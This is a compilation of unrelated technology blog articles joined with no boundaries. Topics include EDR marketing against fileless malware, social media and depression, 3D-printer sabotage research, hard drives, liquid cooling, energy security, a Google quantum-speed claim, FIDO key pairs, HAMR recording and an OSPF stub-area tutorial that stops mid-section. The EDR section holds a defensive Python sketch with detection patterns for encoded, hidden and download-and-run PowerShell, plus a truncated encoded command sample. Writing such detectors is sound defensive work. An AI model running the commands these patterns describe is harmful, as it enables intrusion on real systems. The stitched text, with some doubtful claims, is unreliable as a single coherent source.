The traditional antivirus solutions relied upon by millions of users cannot detect or prevent fileless malware attacks. Therefore, organizations should implement next-generation endpoint detection and response (EDR) solutions. EDR systems rely on continuous, real-time, AI-based monitoring to detect unusual patterns, such as sudden changes in outgoing/incoming network traffic, unwanted operations in native tooling like PowerShell and Windows Management Instrumentation (WMI), and phishing emails, among others.
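As a toy illustration of the kind of signal an EDR agent looks for, the sketch below scans process command lines for hallmarks of abused PowerShell, such as encoded or hidden-window invocations. The patterns and the process snapshot are illustrative assumptions; real products correlate far more telemetry than this.

import re

# Command-line patterns often associated with living-off-the-land abuse
# of PowerShell (illustrative, not exhaustive).
SUSPICIOUS = [
    re.compile(r"-enc(odedcommand)?\s", re.IGNORECASE),    # base64-encoded payloads
    re.compile(r"-windowstyle\s+hidden", re.IGNORECASE),   # hidden console windows
    re.compile(r"downloadstring|iex\s*\(", re.IGNORECASE), # in-memory download-and-run
]

def is_suspicious(cmdline: str) -> bool:
    return any(p.search(cmdline) for p in SUSPICIOUS)

# Hypothetical process snapshot, e.g. gathered by an endpoint agent.
processes = [
    "powershell.exe -WindowStyle Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A...",
    "powershell.exe Get-ChildItem C:\\Reports",
]

for cmd in processes:
    print("SUSPICIOUS" if is_suspicious(cmd) else "ok", ":", cmd[:60])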
Additionally, fileless malware attacks seek to exploit human vulnerabilities to be successful. Therefore, organizations should analyze and monitor human and system behavior as part of a proactive security approach. For example, a managed service provider leverages cutting-edge tools and solutions to monitor your systems 24/7 for behavior that could enable attackers to inject malicious code into the memory of installed software. Employees and other end users should also adhere to the following practices:
- Avoid installing or downloading applications from unknown sources
- Ensure all applications have the latest updates and security patches
- Update the web browsers regularly and avoid clicking on malicious sites
- Be on the lookout for phishing emails
Also, identifying and analyzing attack indicators enables a proactive method for detecting and stopping fileless malware attacks. Indicators of attack don’t focus on the phases of an attack, but on identifying the signs of an attack in progress – in the fileless case, signs such as lateral movement and local or remote code execution. Since fileless attacks evade detection by traditional antivirus software, indicators of attack examine sequences, intent, and context to identify and block malicious actions. Lastly, managed threat-hunting services enable round-the-clock proactive intrusion detection, IT environment monitoring, and the discovery of subtle incidents that go undetected by conventional security tools.
Sentia Can Help Protect Your Organization From Fileless Malware
While traditional firewalls typically provide stateful inspection of incoming and outgoing network traffic, Sentia’s next-generation firewall includes additional features like application awareness and control, integrated intrusion prevention, and cloud-delivered threat intelligence. These are important attributes for flagging unusual traffic resulting from fileless malware attacks. We will design, procure, manage and monitor your entire network, so you can focus on driving business growth and new initiatives. At the same time, our experts leverage advanced monitoring solutions to detect and mitigate fileless malware in your systems. Our enterprise network security offerings include modern enterprise network management for on-premise, cloud, and hybrid environments. Sentia will work with you to design the optimal services to keep your IT infrastructure safe and operational. Contact Sentia today for a free consultation.
Negative social media experience
In today’s lifestyle, social media has become a prominent part of life for many young people. Most people connect with social media without stopping to think about whether the effects are positive or negative. Now, researchers from the University of Pittsburgh and West Virginia University have jointly examined the correlations between negative social media experiences and depression.
In 2016, the research team surveyed a group of students between the ages of 18 and 30 about how they use social media, and also examined the students’ depressive symptoms.
Odds of depressive symptoms
The investigation found that each 10% increase in positive experiences on social media was associated with a 4% decrease in the odds of depressive symptoms – an association weak enough that it could be due to chance. Conversely, each 10% increase in negative experiences was associated with a 20% increase in the odds of depressive symptoms. The researchers also reported that women had 50% higher odds of depressive symptoms than men.
Lead scientist Brian Primack from Pittsburgh found that positive encounters on social media were unrelated, or only marginally related, to lower depressive symptoms, whereas negative experiences were related to higher depressive symptoms.
The researchers recommend strategies to decrease the number of negative interactions on social media platforms that tend to encourage negative experiences. The team also points out that cyberbullying happens between adults, too.
These findings may urge people to reconsider their online exchanges. Moving forward, the results could help researchers develop ways to intervene and counter the negative impacts while strengthening the positive ones.
Security researchers have demonstrated that it is possible for hackers to make undetectable changes to 3D printed parts that could introduce defects and possibly safety risks, too.
Scientists at Rutgers University-New Brunswick and the Georgia Institute of Technology have shown that cyberattacks on 3D printers were likely to pose threats to health and safety. The researchers have also developed ways to combat them.
In a research paper, See No Evil, Hear No Evil, Feel No Evil, Print No Evil? Malicious Fill Pattern Detection in Additive Manufacturing, the researchers used cancer imaging techniques to detect intrusions and hacking of 3D printer controllers. The study was recently presented at the 26th USENIX Security Symposium held in Vancouver, Canada.
“Imagine outsourcing the manufacturing of an object to a 3D printing facility and you have no access to their printers and no way of verifying whether small defects, invisible to the naked eye, have been inserted into your object,” said Mehdi Javanmard, study co-author and assistant professor in the Department of Electrical and Computer Engineering at Rutgers University-New Brunswick. “The results could be devastating and you would have no way of tracing where the problem came from.”
The risk of undetected defective parts stems from the increased use of external 3D printing facilities and services to manufacture goods. Items can be made at these facilities, but there is no standard way to verify them for accuracy, the study said, and the firmware in these printers may be hacked.
The study showed that 3D printers could be hacked to print out defective objects. Researchers have devised a way of detecting and combating 3D printing cyberattacks.
First, the sound and movement of the 3D printer’s extruder is monitored. “Just looking at the noise and the extruder’s motion, we can figure out if the print process is following the design or a malicious defect is being introduced,” said Saman Aliari Zonouz, an associate professor in the Department of Electrical and Computer Engineering at Rutgers University-New Brunswick.
Researchers said they could then use MRI or CT scans to check for defects. Tiny gold nanoparticles, acting as contrast agents, are injected into the filament and sent with the 3D print design to the printing facility. Once the object is printed and shipped back, high-tech scanning reveals whether the nanoparticles – a few microns in diameter – have shifted in the object, or whether it has holes or other defects.
“This idea is kind of similar to the way contrast agents or dyes are used for more accurate imaging of tumours as we see in MRIs or CT scans,” Javanmard said.
In the next five years, researchers will also look at other possible methods of attack on 3D printers, as well as possible defences.
Welcome to another installment of Terminology Tuesday! Where we define some commonly misused and misunderstood computer terms!
Today’s term is Hard Drive.
Hard drives (HDs) are used to store and retrieve all manner of digital data. This includes Word documents and pictures, spreadsheets and movies, music, and everything in between. When we talk about storage space on a computer, we’re talking about the size of the HD. This size is measured in gigabytes (GB): the more GB the HD has, the more documents, pictures, songs, etc. can be held on the disk. The typical capacity of an HD is anywhere between 500 GB and 1,000 GB (also called 1 terabyte, or TB).
Hard drives are not the only way data is stored – most of Apple’s laptops use flash storage instead. These are the two main options when it comes to storing data on a computer. The type of storage affects the computer’s performance, so the terms hard drive and flash storage cannot be used interchangeably, even though they perform the same duties.
A downside of hard drives is that they can go bad and fail, causing the data stored on them to be lost. Understanding how they work helps explain why this happens. Inside the HD, an arm reads data off a rapidly rotating disk, similar to the way a record player reads music off vinyl. The moving parts can scratch the disk, making data unreadable. Bottom line: be very careful when moving computers with HDs, and always make sure you back up your data to an external drive.
Liquid cooling for electronic components isn’t a new technology – it’s been used since before 1887 for insulating and cooling high-voltage transformers. One of the earliest uses for liquid cooling compute equipment was in the 1960s, with IBM’s System 360 computers. By the 1980s, liquid cooling was popular for supercomputers and mainframes, the early precursors to today’s data centers in terms of computer density, power use and heat generation. Now, in 2019, liquid cooling is, once again, becoming the go-to solution for data center cooling.
So how and why have cooling technologies evolved from liquid, to air, and back to liquid again?
Back in the swim
In the early days of mainframe computing, there were few alternatives to liquid cooling. The heat density of the equipment simply could not be handled with air cooling. The superior heat transfer capabilities of liquid (over 1,000x more heat capacity than air) provided mainframe manufacturers with a reliable solution.
All that changed with the introduction of complementary metal–oxide–semiconductors (CMOS). This technology radically reduced the power consumption (and therefore heat generated) by the semiconductors used to build computer systems, and it became possible to cool these systems with air, at a lower cost than liquid cooling. Over the last few decades, air cooling systems have become more efficient, as new technologies have moved the cooling system closer to the heat loads – from the perimeter of the room with computer room air conditioning (CRAC) and computer room air handlers (CRAH), into the row of racks (in-row cooling), to the back of the rack (rear-door heat exchangers). However, at the same time the heat generated by ever more powerful servers continues to escalate – pushing, and exceeding, the limits of air-cooling capabilities.
Now, the pendulum is swinging back. New applications like blockchain, artificial intelligence (AI), machine learning, and other high-performance computing applications require more powerful systems. And more powerful systems mean more heat. The once economical air cooling solutions are becoming increasingly complex and costly to build and operate, as they struggle to keep up with these new demands. At the same time, liquid cooling solutions have become increasingly cost effective, and often provide higher ROI and lower total cost of ownership than their air-cooled counterparts. These benefits are no longer limited to just high-density data centers. In fact, many of the economic benefits are realized with density as low as 15 kw per rack.
This transition back to liquid cooling started in the early 2000s.
- Fujitsu released the GS8900 mainframe with a hybrid water cooling system
- IBM released a rear-door heat exchanger for use with its dense blade servers, becoming the first major company to start using water cooling for CMOS processors
- IBM introduced the Power 575, a supercomputer using a direct cooling system with water-cooled copper plates above the microprocessors – its first liquid-cooled system for a mainframe since the ES/9000
- CoolIT shipped direct contact liquid cooling (aka liquid-to-chip)
- Green Revolution Cooling (now GRC) introduced CarnoJet, with single-phase liquid immersion cooling
- Iceotope launched with immersion tanks on processor blades
- Two-phase immersion technology was adopted by crypto-miners
These are no longer niche solutions; data centers are now broadly adopting liquid cooling. A 2018 Uptime Institute survey revealed that 14 percent of data centers currently use some form of liquid cooling to address their need for increased efficiency and lower operating costs. Which liquid cooling solution is right for your organization depends on a variety of factors, including rack density, space constraints, data center or edge location requirements, whether the computing systems are GPU/ASIC-based or CPU-based, the server refresh cycle, and whether the space is a retrofit or a new build.
Cooling the equipment is one of the major challenges of managing any dense computing environment. As new high-performance computing applications require even more power and generate more heat, they’re exceeding the capabilities of air-cooling. Liquid cooling is a cost-effective solution – offering higher return on investment and lower total cost of ownership for almost all data centers. If you haven’t investigated liquid cooling for your data center yet, now is the time.
Maintaining the energy grid is already essential—it’s part of what keeps traffic lights functioning and security systems from failing us. There’s no denying that modern society has a reliance on electricity that makes it difficult to imagine us maintaining our quality of life without it. However, we’re on the precipice of a time where uncertainty shrouds the energy sector. The future of our energy needs, sources, and what that power will be used for isn’t clear, but what is obvious is that the security of the energy sector is going to become paramount in the near future.
Heavier Reliance on Automation
We’re on the brink of a revolution in how work is done, not too dissimilar from the Industrial Revolution. If we think of the Industrial Revolution as having replaced much of the physical burden that manual labor required, the era we’re heading into will see much less reliance on the mental labor that comes with many jobs. This means automating everything from truck driving, to security systems, to personal assistants and secretaries. Doing so could lead to increased efficiency and lower upfront costs for many businesses, but it also means a heavier reliance on the energy sector to keep those automated systems up and running.
Uncertainty About the Future of Energy
There’s a huge push to put more forms of alternative energy in place, but the timeline for adopting these technologies is unclear. Not only do these systems offer cleaner, sustainable energy; decentralizing energy can also address many of the traditional security concerns associated with the sector. Nonetheless, if we jump ship too soon and leave our traditional energy sources unprotected, the results could be disastrous.
Shifting Control of Global Energy Supply
This goes hand-in-hand with changes in energy technology. For ages, energy like oil was in the control of whoever had it. That fact alone had massive impacts on geopolitical power structures and who was able to control the global energy supply. As we move away from energy sources like oil and gas, it could cause international tension between nations. Keeping energy facilities protected in light of those potential tensions is an absolute necessity.
Improving the Energy Sector With Gatekeeper
Gatekeeper Security’s suite of intelligent optical technologies provides security personnel with the tool to detect today’s threats. Our systems help those in the energy, transportation, commercial, and government sectors protect their people and their valuables by detecting threats in time to take action. From automatic under vehicle inspection systems, automatic license plate reader systems, to on the move automatic vehicle occupant identifier, we offer full 360-degree vehicle scanning to ensure any threat is found. Throughout 30 countries around the globe, Gatekeeper Security’s technology is trusted to help protect critical infrastructure. Follow us on Facebook, Google+, and LinkedIn for updates about our technology and company.
With an enthusiastic cry, Google announces that super-fast quantum computing is 100 million times faster than your regular computer
They finally cracked it. At least, that is what they appear to be saying. With this announcement, Google may have just told us that super-fast quantum computing is no longer a dream.
The story started two years ago, when Google bought a D-Wave 2X quantum computer. That was the starting point for its experiments at the U.S. space agency’s Ames Research Center in Mountain View, California. After two years of hard work, they have finally arrived at a desirable conclusion.
The primary goal was to shorten the calculating time for extremely complex problems. It is now a matter of seconds rather than years: Google has announced the calculating speed to be not 100, not 1,000, not even 100,000, but 100,000,000 times faster than our regular systems.
The rules are simple: quantum computers do their computing according to quantum mechanics, and that is what makes the device so much faster. Whereas a normal computer stores and transfers ‘bits’ of information that are each either a ‘1’ or a ‘0’, a quantum computer uses ‘qubits’. A qubit is a unit of quantum information – one physical realization is a two-state polarization system, with one horizontal and one vertical state. Instead of having to settle on one value at a time, a qubit can exist in a superposition and effectively represent both states at once.
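To make the idea concrete, here is a small illustrative sketch that represents a qubit as a two-component state vector and computes measurement probabilities with NumPy – a drastic simplification of the real physics, but enough to show how one qubit carries both values at once.

import numpy as np

# Basis states |0> and |1> (e.g., horizontal and vertical polarization).
zero = np.array([1.0, 0.0])
one = np.array([0.0, 1.0])

# An equal superposition: the qubit holds both basis states at once.
superposition = (zero + one) / np.sqrt(2)

# Measurement probabilities are the squared amplitudes (the Born rule).
probs = np.abs(superposition) ** 2
print("P(measure 0) =", probs[0])  # 0.5
print("P(measure 1) =", probs[1])  # 0.5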
So now that it’s out, give us your thoughts on this era of super-fast computing we are about to enter.
Key-based multi-factor authentication is one of the best ways to secure access to data, to a network, or to a user account. Unlike a single-password system that grants total access if that one password is deciphered, multi-factor authentication requires more than one component to be present for full access, dramatically reducing the chances of phishing or other forms of identity theft to succeed.
Multifactor authentication can be faster, easier, and more secure than traditional single-password security systems using FIDO protocols and key pair technology.
What Is FIDO?
FIDO stands for Fast Identity Online. It is a global alliance of companies dedicated to establishing cryptographic security standards that integrate easily into systems and with each other, eliminating the reliance on traditional knowledge-based systems (such as username/password). FIDO protocols embrace various security measures, including key-based biometrics such as fingerprint, voice, and face recognition, security tokens, NFC cards, and other forms of key-based multi-factor authentication.
By ensuring that industry standards are established and observed, different security devices and software are compatible and interoperable, ensuring that no device or software will fail to work with another system.
What Is A Key Pair?
A key pair is a security measure built on two mathematically linked digital “keys” – one public, one private – which together (the “key pair”) are used to securely grant account access in a phishing-resistant manner. The public key is registered with the service and is what the service uses to verify the account holder; it can be shared freely because it cannot be used on its own to gain access.

The private key never leaves the user’s device. During login, the device uses it to answer a cryptographic challenge from the service (and, where encryption is used, to decrypt data and make it readable again). Both halves of the pair must correspond – the service’s public key and the device’s private key – before access to the account or its data is granted.
Under the FIDO protocols, a user goes through the normal registration procedure to create a new account while, behind the scenes, the system generates a public–private key pair for that account. Once registration is complete, every login to an account protected by the key pair involves the service issuing a challenge that only the matching private key can answer; the service verifies the response with the registered public key before unlocking the account and the data it protects.
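To make the flow concrete, here is a minimal sketch of this style of challenge–response authentication, illustrated with Ed25519 signatures via the Python cryptography package. (Real FIDO implementations add attestation, signature counters, and origin binding; this shows only the core idea.)

import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Registration: the device generates the pair; the service stores only the public key.
device_private_key = Ed25519PrivateKey.generate()
service_public_key = device_private_key.public_key()

# Login: the service sends a random challenge, and the device signs it.
challenge = os.urandom(32)
signature = device_private_key.sign(challenge)

# The service verifies the signature with the registered public key.
try:
    service_public_key.verify(signature, challenge)
    print("Signature valid: access granted")
except InvalidSignature:
    print("Signature invalid: access denied")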
This is a much stronger form of protection against conventional phishing techniques and the man-in-the-middle attacks used to steal user credentials and take over accounts. Because two cryptographic keys are required, even if a bad actor manages to steal the public key, they can go no further: without the private key they cannot unlock the account or access its data.
If you’re interested in using FIDO key pairs and multi-factor authentication to protect users on devices accessing services and data, read here to learn more.
An international team of researchers led by the University of York in England has demonstrated fast data recording on hard drives using heat.
They used an ultra-short pulse of heat to reverse the poles in a ferrimagnet in order to write the data.
“It was, until now, generally accepted that a directional stimulus must reverse magnetization,” University of York scientist Thomas Ostler told TechNewsWorld. “We have now shown that there is something missing in the conventional picture. Using very short heat pulses of around 50 femtoseconds, we have found a way to reverse magnetization without the need for a directional stimulus.”
Cut one second into a billion pieces, then take one millionth of one of those pieces, and you have a femtosecond.
What the Researchers Found
The researchers used magnetic disks down to 500 nm in diameter.
The experiments used a glass substrate with an insulating seed layer. The magnetic signal was read through the rear of the sample while the heat was applied from the top.
Currently, the hard drive industry is looking into using heat assisted magnetic recording (HAMR), which “is a combination of traditional giant magneto-resistive head technology with laser technology,” John Monroe, a research vice president at Gartner, told TechNewsWorld.
However, there is “still some way to go before femtosecond lasers could be employed in hard drives,” Ostler said. “Our results are a proof of principle and require very expensive femtosecond lasers that can generate very fast pulses.”
What Is HAMR?
HAMR magnetically records data on media made from highly stable magnetic compounds such as iron platinum alloy after first heating the material with lasers.
These magnetic compounds can store single bits in a much smaller area than current technology does, provided they’re heated first.
HAMR was developed by Fujitsu in 2006.
Proponents of HAMR claim it should be able to achieve a storage density of 10 terabytes of data per square inch, Gartner’s Monroe said. However, critics contend that the cost of creating highly coordinated laser and read/write head technology, combined with the danger of data loss from accidentally heating adjacent storage bits, makes it impractical.
The process used by the University of York’s team might get around the heat problem because “the laser pulse is so fast that the demagnetization process is very different from that occurring following a slow increase in temperature,” Ostler pointed out. However, exactly how this works is still being studied.
The researchers’ process could change the face of HAMR. A strong field is required to reverse magnetization using HAMR, but “our technology only requires the use of heat,” Ostler said. This might be able to reduce the power consumption required when HAMR technology is employed.
Extending the Limits of Storage
Existing storage technology, which employs perpendicular magnetic recording (PMR), achieves 700 GB per square inch, Fang Zhang, a research analyst at IHS iSuppli, told TechNewsWorld. The upper limit of this technology is 1 terabyte per square inch.
The upper limit for HAMR is thought to be 10 terabytes per square inch. However, “right now there are many technical issues that need to be resolved” so that limit has not yet been attained, Zhang pointed out.
It’s not yet clear whether the technology used by the team led by the University of York can exceed HAMR’s limits.
“The fine details of how this physical phenomena would be engineered in a device are not yet known,” Ostler said. “However, we envisage using near-field optics to focus the light from the laser onto very specific areas of the disc as the disc is spinning. Thus one pulse per bit would be required.”
Near-field optics looks at configurations that depend on the passage of light between very small elements with one or more dimensions smaller than the wavelength of that light.
Survival of the Fittest
Hard drive makers may eventually need a new technology in order to survive.
“Due to the uptake of solid state drive and flash storage, hard disk vendors are facing a decline,” Charles King, principal analyst at Pund-IT, told TechNewsWorld. “A commercially viable, affordable HAMR solution could literally breathe life into the troubled HDD industry.”
The hard drive industry has been wrestling for some time with different solutions to the problem.
Seagate opted for HAMR, but some other vendors, including Western Digital, selected nanoimprint lithography (NIL). This is also known as “bit patterned recording.”
“Both technologies remain in heavy development throughout the industry,” Mark Geenen, chairman of the board of the International Disk Drive Equipment and Materials Association (IDEMA), told TechNewsWorld. “HAMR is ahead slightly.”
OSPF is easy to understand – once you get over the FIVE BILLION new acronyms and buzzwords that you need to memorise.
Unfortunately, the people who write study guides frequently insist on using as many of those buzzwords as they can in the space of a minute, so you end up having to wrap your head around sentences like “We filter Type 5 LSAs in the NSSA at the ABR, though the ASBR can still generate Type 7s and they’ll be swapped for Type 5s on egress to the backbone”. When I hear sentences like that, I conclude that it’s actually a good thing when nerds get bullied.
Stub areas are a good example of something that isn’t too complicated – unless you insist on explaining it using all the jargon under the sun, in which case it can be daunting. So, in this post I’ll start by explaining what a stub area is, without using any OSPF jargon. We’ll take it slow, like new lovers, or someone cooking an expensive turkey.
Then, once we’ve got the idea down, we’ll start to talk about the various LSAs (Link-State Advertisements) that our routers generate, to see exactly what’s going on under the hood when we configure this area type. Let’s do it!
(Hi there CCNP students! This blog mainly uses Juniper output, but shows you both Cisco and Juniper config examples. The behaviour is almost exactly the same between the two vendors, and on the rare occasions where the behaviour is different, I’ll let you know how both works. And hey, if you’re curious to see how Juniper config works, you might well enjoy my Junos for Cisco IOS Engineers series. Gosh I treat you well!)
WHAT IS AN OSPF STUB AREA? WHY MIGHT WE NEED THEM?
Imagine a large network, perhaps one that spans across an entire country, or one that goes all the way to the moon. Either way, this network probably contains hundreds of links, and thousands of prefixes. Is it exciting for you to think about a network so big? It is? That’s nice. You can keep on thinking about it if you like? If it’s making you happy? No need to rush away from that lovely thought.
What would such a network look like in practice? You’ve probably seen already in your OSPF studies that sometimes you might just have one large flat Area 0 backbone, while other times you might additionally have any number of branch offices contained in their own OSPF areas, attached to the backbone.
In that scenario, where you have smaller areas attached to the backbone area, here’s a question for you: do those branch offices really need to know every single prefix in your entire OSPF network?
The answer to that question depends on a lot of factors.
For example, does the branch area have just the one WAN circuit out to the rest of the network, or does it instead have multiple WAN links? If it is indeed just the one link, maybe you’d be better off with a single default route, instead of thousands of prefixes in your routing table which all ultimately point out of the same interface.
Another example: perhaps the routers at that branch are very old or cheap, and have limited memory? Sounds like another good reason to just have a default route, even if you’ve got multiple WAN links. After all, if you’ve got a $60 DSL router that can allegedly run OSPF, I’d bet money that its memory is pretty small. Just because a router can run OSPF in theory, doesn’t mean that it will run it well.
In those examples we’re thinking about replacing everything with just a default route. But if you’ve got a couple of links out, there might be situations where we actually do want to let certain prefixes through, to give us a balance between more optimal routing decisions vs keeping our router’s memory light. Perhaps we point a default route down one interface, and then we choose just a few more specific routes to “leak” into the area. Not everything: just our most important prefixes, let’s say. If you’ve got cheap routers that aren’t powerful, and you’ve got multiple WAN links out, that would be a perfect candidate for this scenario.
So then the next question is: how can we filter out the prefixes we don’t care about? How do we take just a small sub-set of the total prefixes in our OSPF domain, and advertise only them into this smaller area?
There’s a few methods available to us. One is to do it manually, using some kind of access list/prefix list, or a routing policy. Not a bad idea – but prone to errors, particularly if new prefixes appear elsewhere in the network which slip through your list.
So how about this: what if there was a way of just saying “filter out all prefixes that didn’t originate in OSPF”, or maybe even “filter out all prefixes that don’t originate from this area”.
Well, as it happens, that’s exactly what the different kinds of “stub area” do!
It turns out that the way OSPF advertises prefixes from other areas is different from the way OSPF advertises prefixes from within the area your router is in. The same is true for prefixes that didn’t originate from OSPF: redistributed prefixes are advertised in a slightly different way too. This “different way” involves using different types of Link-State Advertisement. You might remember that these LSAs are like the building blocks of the entire OSPF database, containing all the topology/prefix/cost information – and knowing the different types of LSAs that are generated gives us the power to choose which LSA types we want to let in, and which ones we want to get rid of.
Later on we’ll talk more about these LSA types. For now, let’s build a lab.
CHECK OUT MY SWEET TOPOLOGY
Here’s a silly topology I’ve made to highlight the different kinds of area we can choose from, and what happens when we choose them. It’s a perfect topology for a lab – but if you ever see anyone design a network like this in real life, fire them.
You can see that we have a small Area 0, with two other small areas attached to it: Area 1, and Area 2. If something in Area 1 wants to talk to something in Area 2, the traffic has to go via the Area 0 backbone. That’s the law!
Router 4 itself is home to six IP ranges: 4.1.1.0/24, 4.1.2.0/24, and so on, up to 4.1.6.0/24. These ranges all live within Area 2. Keep an eye out for these prefixes when we look at Router 1’s routing table in a moment, because we’re going to do some magic with them.
Router 5 is outside of our OSPF network. And hey, guess what: Router 5 is also hosting six IP ranges. What are the chances of these ranges starting with a first octet of 5? One hundred percent chance! Yep: 5.1.1.0/24, 5.1.2.0/24 and so on.
Router 4 is learning these six prefixes by BGP, and there’s a policy on Router 4 to re-advertise them into OSPF. This makes Router 4 an ASBR, or Autonomous System Boundary Router. Calling a router an ASBR is basically a fancy way of saying that the router lives on the border (ie the boundary) of the network, connecting the OSPF world to the BGP world.
WARNING: In the real world you’ll want to be very very very very VERY careful about redistributing BGP into OSPF. But this is just a lab, so let’s throw caution to the wind.
In this topology, our boundary router actually does live on the boundary of the network. However, it doesn’t have to. In fact, if you have static routes on any box, and you redistribute them into OSPF, then technically that router has been promoted to being an ASBR! Even if that router lives slap-bang in the middle of the network, OSPF would still call it a “boundary” router. This makes sense when you think of static routes as being their own protocol. The router is acting as the boundary between OSPF and the static routes, like a bouncer at a night-club acting as the boundary between “you” and “getting your funk on”.
LET’S MAKE FRIENDS WITH ROUTER 1’S ROUTING TABLE
Let’s look at the routing table on Router 1, a router in Area 1.
(Hey there CCNP students: notice in this screenshot that in Junos, we just type “show route” rather than “show ip route”.
Also hey there: do you see how all the IPs are just listed in numerical order, rather than in a seemingly random order that’s then sub-divided by the extremely legacy “classful addressing” system which hasn’t been used in about 25 years, like IOS insists on doing it? I don’t know about you, but I find this layout FAR easier to read!)
Router 1’s routing table is pretty big, considering that Area 1 only contains one and a half routers! It’s clear that Router 1 knows about every single prefix in the entire network, including all six of the 4.1.x.x/24 prefixes from Router 4, and also all six of the 5.1.x.x/24 prefixes that were coming in from BGP.
(CCNP students: notice that OSPF’s administrative distance (what Junos calls the “route preference”) is different in Junos: 10 for regular OSPF, 150 for external OSPF.)
What we’ve learned here is that the default behaviour in OSPF is to take all prefixes from one area, and advertise them to another area. The border router between Area 0 and Area 2 takes all the prefixes in Area 2, and redistributes them into the backbone. Then, the border router between Area 1 and Area 0 takes all the prefixes in Area 0, and redistributes them into Area 1.
You can imagine that in the real world, this default behaviour would mean that a small branch router could potentially be learning thousands and thousands of prefixes! Is that really necessary? No sir/madam!
So, let’s make area 1 a “stub area”, and see what happens. How do we do that? Whether we’re using Juniper or Cisco, it’s hella easy. We just need to add the config below onto every box in area 1. It’s really important that it’s added everywhere in Area 1, otherwise our adjacencies won’t come up.
If you’re rocking dem fine Juniper boxes, it’s one command:
root@Router_1# set protocols ospf area 1 stub
As for Cisco IOS, it’s just as easy:
R1(config)#router ospf 1
R1(config-router)#area 1 stub
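Before we look at the result, it’s worth knowing how to confirm the area type on the boxes themselves (exact output varies by software version, so take the details with a pinch of salt):

root@Router_1> show ospf overview
R1#show ip ospf

On Junos the overview lists each area’s stub type; on IOS you’ll see a line along the lines of “It is a stub area”.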
What’s the result of this config? To find out, let’s look at the routing table on Router 1 AFTER we turned Area 1 into a stub.
Give yourself ten points if you’ve spotted the difference: all the prefixes from the 5.1.x.x/24 BGP ranges are gone!
Our routing table is significantly lighter now. Scale this out to many thousands of external prefixes, and the value of a stub area becomes clear.
What have we learned? “Stub areas” block any prefixes that meet these two conditions: a) they’re being passed from Area 0 into the stub area, and b) they originally came from another protocol, redistributed into OSPF.
Remember, static routes count as “another protocol”. Folks often forget this, and end up filtering out prefixes they don’t mean to filter out!
In the next section we’re going to see how the different types of Link-State Advertisement are used to make this filtering a breeze.
Before we move on though, you might be wondering: it’s not much use filtering out those prefixes if we don’t have some alternative way of getting to them. Perhaps we need a summary prefix like a /22, or even a default route?
Interestingly, if Router 2 were a Cisco, it would actually advertise a default route by, er, default! It’s the standard behaviour, no extra config needed. On the other hand, Junos doesn’t assume that you want a default route. Junos leaves you to configure one if you do.
Luckily, getting Junos Router 2 to advertise this default route into Area 1 is as simple as adding two extra words to the command we typed earlier:
root@Router_2# set protocols ospf area 1 stub default-metric 10
Neither vendor’s behaviour is better, or right, or wrong. What matters is to know the default behaviours of each vendor, and know when to override them. Truly, this attitude is the solution to a more peaceful and better world.
LET’S REVISE TYPE 1 AND TYPE 2 LSAs
Let’s talk more about these Link-State Advertisements that OSPF creates.
An LSA is basically like a database item that a router generates and then advertises to all other routers, that tells the rest of the network some interesting information about that router’s presence on the network, for example:
- The router’s unique ID
- What links are attached to the router
- What IP networks live on those links
- What the metric/cost is on that link
- Whether the link is attached to a shared segment, like an ethernet switch with multiple routers on the subnet
These LSAs are like pieces of a jigsaw puzzle. When every router has received every single LSA from every box in its own area, every router in the area can put them together to create the entire area’s topology – and crucially, every router in the area will have exactly the same set of LSAs, and therefore exactly the same view of the network.
There are lots of different kinds of LSA, and each one serves a different purpose.
For example, you might have learned already that a Type 1 LSA is also known as a Router LSA. A router generates this LSA to say what its ID is, what links are attached to it, and what prefixes are on those links. It also lists the cost of each link. Type 1 Router LSAs are one of the essential building blocks for creating the topology itself.
However, it’s not the end of the topology story: if a link is part of a shared segment, like that ethernet switch we mentioned a moment ago, then there’s actually a special LSA that describes this shared network, and lists all the links attached to it. It’s called a Type 2 LSA, which is also known as the Network LSA.
I want to stay focused on stub areas for now, so what I’m about to say is an oversimplification: a Type 2 Network LSA helps to simplify how routers calculate best paths.
Imagine fifteen routers on a shared segment, all connected to a switch. Without this special Type 2 LSA, the topology would logically look like each of these 15 routers had a direct point-to-point connection to every other router on the LAN. That’s a lot of links: 15 × 14 ÷ 2 = 105 pairwise relationships! Instead, the Type 2 Network LSA makes it look like there’s an invisible zero-cost router in the middle of it all – which, in effect, there is! There’s a switch, and all routers connect to it, so the topology shrinks back down to just 15 links.
If you’ve got just the one area, then chances are that you only need those two kinds of LSA: one to advertise the routers themselves and the links they’re hosting, and one to advertise the existence of shared broadcast segments. Indeed, if you configure all your ethernet links as point-to-point, you could actually have a network made up entirely of Type 1 LSAs. Pretty simple!
LET’S REVISE TYPE 3 LSAs
However, if you’ve got multiple areas, like in our diagram, then chances are you might also have a few Type 3 LSAs, otherwise known as Summary LSAs.
Don’t be fooled by the name: the word “summary” here doesn’t refer to summarising multiple subnets into a single bigger subnet. Instead, the summary LSA is actually summarising the topology information.
In our lab network, Area 1 doesn’t need to know the topology of Area 0 and Area 2. Area 1 possibly needs to know about the prefixes in those areas – but not the topology. Indeed, that’s exactly why we’ve chosen to put Area 1 in its own unique area. A link going down in Area 0 or Area 2 shouldn’t mean that Area 1 needs to do any new best-path calculations.
But what definitely should happen is that the relevant prefixes need to disappear from Area 1.
With that in mind, the router connecting Area 1 and Area 0 – the Area Border Router, or ABR – takes every prefix it’s learned from Area 0, and re-generates them as new Link-State Advertisements pointing to itself. It then advertises these prefixes into Area 1 via these special Type 3 Summary LSAs. In our topology, you can think of Router 2 almost as if it’s taking these 4.1.x.x/24 prefixes, and changing the next-hop to itself. Instead of telling Area 1 that these IPs live on Router 4, Router 2 is saying “don’t worry about where these prefixes live. All you need to know is that you can get to them via me, and I’ll take care of the rest.”
LET’S REVISE TYPE 5 LSAs
There’s one more Link-State Advertisement type that I want you to know about: External LSAs, otherwise known as Type 5 LSAs. As the name says, External LSAs represent IPs that live outside of the network. They’re generated by the border router, aka the ASBR, aka the Autonomous System Boundary Router – the router doing the redistribution.
At this point, many folks often wonder “Does OSPF actually need so many LSA types? This seems excessive!”. Well, you could argue that OSPF doesn’t need them – but by having many different types, it actually gives us some useful advantages.
